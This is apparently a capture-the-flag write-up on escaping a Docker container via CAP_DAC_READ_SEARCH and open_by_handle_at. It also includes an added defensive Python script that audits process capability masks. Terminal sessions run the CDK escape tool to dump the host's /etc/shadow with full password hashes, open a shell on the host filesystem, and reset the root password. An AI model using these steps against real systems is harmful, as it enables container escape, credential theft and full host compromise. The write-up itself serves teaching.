CAP_DAC_READ_SEARCH
cap_dac_read_search allows a process to bypass file read permission checks and directory read and execute permission checks. While it was designed for searching or reading files, it also grants the process permission to invoke open_by_handle_at(2).
Any process holding CAP_DAC_READ_SEARCH can use open_by_handle_at(2) to gain access to any file, even files outside its own mount namespace.
The handle passed into open_by_handle_at(2) is intended to be an opaque identifier retrieved using name_to_handle_at(2). However, this handle contains sensitive and tamperable information, such as inode numbers.
This was first shown to be an issue in Docker containers by Sebastian Krahmer with the Shocker exploit.
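Because the risk described above comes purely from a process holding this capability, the practical defensive check is to audit the effective capability set of processes inside a container. The following script is an added example, not code from this write-up or from the CDK tool: it parses the CapEff bitmask from a /proc/<pid>/status text, decodes it into capability names using the bit numbers from linux/capability.h, and flags CAP_DAC_READ_SEARCH (bit 2). The two embedded status excerpts are constructed samples; the first uses the mask that Docker's default capability set produces, the second the same mask with bit 2 added, as a stand-in for a container started with --cap-add=DAC_READ_SEARCH.

```python
"""Audit a process's effective capability set for CAP_DAC_READ_SEARCH.

Added example (not part of the original write-up). It decodes the CapEff
line of a /proc/<pid>/status file so an operator can see whether a
container process holds the capability that open_by_handle_at(2) requires.
"""
import os

# Capability bit numbers as defined in linux/capability.h.
CAP_NAMES = {
    0: "cap_chown", 1: "cap_dac_override", 2: "cap_dac_read_search",
    3: "cap_fowner", 4: "cap_fsetid", 5: "cap_kill", 6: "cap_setgid",
    7: "cap_setuid", 8: "cap_setpcap", 9: "cap_linux_immutable",
    10: "cap_net_bind_service", 11: "cap_net_broadcast", 12: "cap_net_admin",
    13: "cap_net_raw", 14: "cap_ipc_lock", 15: "cap_ipc_owner",
    16: "cap_sys_module", 17: "cap_sys_rawio", 18: "cap_sys_chroot",
    19: "cap_sys_ptrace", 20: "cap_sys_pacct", 21: "cap_sys_admin",
    22: "cap_sys_boot", 23: "cap_sys_nice", 24: "cap_sys_resource",
    25: "cap_sys_time", 26: "cap_sys_tty_config", 27: "cap_mknod",
    28: "cap_lease", 29: "cap_audit_write", 30: "cap_audit_control",
    31: "cap_setfcap", 32: "cap_mac_override", 33: "cap_mac_admin",
    34: "cap_syslog", 35: "cap_wake_alarm", 36: "cap_block_suspend",
    37: "cap_audit_read", 38: "cap_perfmon", 39: "cap_bpf",
    40: "cap_checkpoint_restore",
}

CAP_DAC_READ_SEARCH = 2

# Constructed sample status excerpts (not captured from a real host).
# 00000000a80425fb is the mask Docker's default capability set yields;
# the second sample adds bit 2 (CAP_DAC_READ_SEARCH) to that mask.
SAMPLE_DEFAULT = "Name:\tbash\nPid:\t1\nCapEff:\t00000000a80425fb\n"
SAMPLE_WITH_DAC_READ_SEARCH = "Name:\tbash\nPid:\t1\nCapEff:\t00000000a80425ff\n"


def parse_cap_field(status_text: str, field: str = "CapEff") -> int:
    """Return the bitmask from the given Cap* line (hex in /proc status)."""
    for line in status_text.splitlines():
        if line.startswith(field + ":"):
            return int(line.split(":", 1)[1].strip(), 16)
    raise ValueError(f"{field} line not found in status text")


def has_cap(mask: int, bit: int) -> bool:
    """True if capability number `bit` is set in `mask`."""
    return bool((mask >> bit) & 1)


def decode_caps(mask: int) -> list[str]:
    """Expand a capability bitmask into a list of capability names."""
    names = []
    bit = 0
    while mask >> bit:
        if has_cap(mask, bit):
            names.append(CAP_NAMES.get(bit, f"cap_{bit}"))
        bit += 1
    return names


def audit_status(status_text: str) -> dict:
    """Summarise the effective set and flag CAP_DAC_READ_SEARCH."""
    mask = parse_cap_field(status_text)
    return {
        "mask": mask,
        "caps": decode_caps(mask),
        "dac_read_search": has_cap(mask, CAP_DAC_READ_SEARCH),
    }


def audit_pid(pid: int) -> dict:
    """Audit a live process by reading /proc/<pid>/status (Linux only)."""
    with open(os.path.join("/proc", str(pid), "status"), encoding="ascii") as fh:
        return audit_status(fh.read())


if __name__ == "__main__":
    for label, text in (("default", SAMPLE_DEFAULT),
                        ("cap-add", SAMPLE_WITH_DAC_READ_SEARCH)):
        result = audit_status(text)
        print(f"{label}: 0x{result['mask']:x} "
              f"dac_read_search={result['dac_read_search']}")
        print("  " + " ".join(result["caps"]))
    if os.path.isdir("/proc/self"):
        print("self:", audit_pid(os.getpid())["dac_read_search"])
```

The same mask can be cross-checked with capsh --decode=0xa80425fb from libcap. If the audit reports dac_read_search=True for a container workload, the remediation is to drop the capability from the container spec (or confirm the workload genuinely needs it), since the write-up shows that the capability alone is enough to reach host files.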
root@c150397ccd63:/root# ./cdk run cap-dac-read-search
running with target: /etc/shadow, ref: /etc/hostname
root:$6$9GrOpvcijuCP93rg$tkcyh.ZwH5w9AHrm66awD9nLzMHv32QqZYGiIfuLow4V1PBkY0xsKoyZnM3.AI.yGWfFLOFDSKsIR9XnKLbIY1:19066:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::
sys:*:18659:0:99999:7:::
sync:*:18659:0:99999:7:::
games:*:18659:0:99999:7:::
man:*:18659:0:99999:7:::
lp:*:18659:0:99999:7:::
mail:*:18659:0:99999:7:::
news:*:18659:0:99999:7:::
uucp:*:18659:0:99999:7:::
proxy:*:18659:0:99999:7:::
www-data:*:18659:0:99999:7:::
backup:*:18659:0:99999:7:::
list:*:18659:0:99999:7:::
irc:*:18659:0:99999:7:::
gnats:*:18659:0:99999:7:::
nobody:*:18659:0:99999:7:::
systemd-network:*:18659:0:99999:7:::
systemd-resolve:*:18659:0:99999:7:::
systemd-timesync:*:18659:0:99999:7:::
messagebus:*:18659:0:99999:7:::
syslog:*:18659:0:99999:7:::
_apt:*:18659:0:99999:7:::
tss:*:18659:0:99999:7:::
uuidd:*:18659:0:99999:7:::
tcpdump:*:18659:0:99999:7:::
landscape:*:18659:0:99999:7:::
pollinate:*:18659:0:99999:7:::
usbmux:*:18849:0:99999:7:::
sshd:*:18849:0:99999:7:::
systemd-coredump:!!:18849::::::
lxd:!:18849::::::
saul:$6$19rUyMaBLt7.CDGj$ik84VX1CUhhuiMHxq8hSMjKTDMxHt.ldQC15vFyupafquVyonyyb3/S6MO59tnJHP9vI5GMvbE9T4TFeeeKyg1:19058:0:99999:7:::
By default, it reads the /etc/shadow file from the host, but there are more options available:
root@c150397ccd63:/root# ./cdk run cap-dac-read-search /etc/hosts /
./cdk run cap-dac-read-search /etc/hosts /
running with target: /, ref: /etc/hosts
executing command(/bin/bash)...
root@c150397ccd63:/#
This command basically spawns a shell session and attaches it to the current session. Notice the directory has been changed to the system root, /. I’m in the target host now.
root@c150397ccd63:/root/.ssh# passwd
passwd
new password: qwe123
retype new password: qwe123
passwd: password updated successfully
From there, I could just change the password of the root user:
saul@talkative:/dev$ su root
su root
password: qwe123
root@talkative:/dev# whoami
whoami
root
root@talkative:/dev# hostname
hostname
talkative
root@talkative:/dev# hostname -I
hostname -I
10.10.11.155 172.17.0.1 172.18.0.1 dead:beef::250:56ff:feb9:6b83
System Level Compromise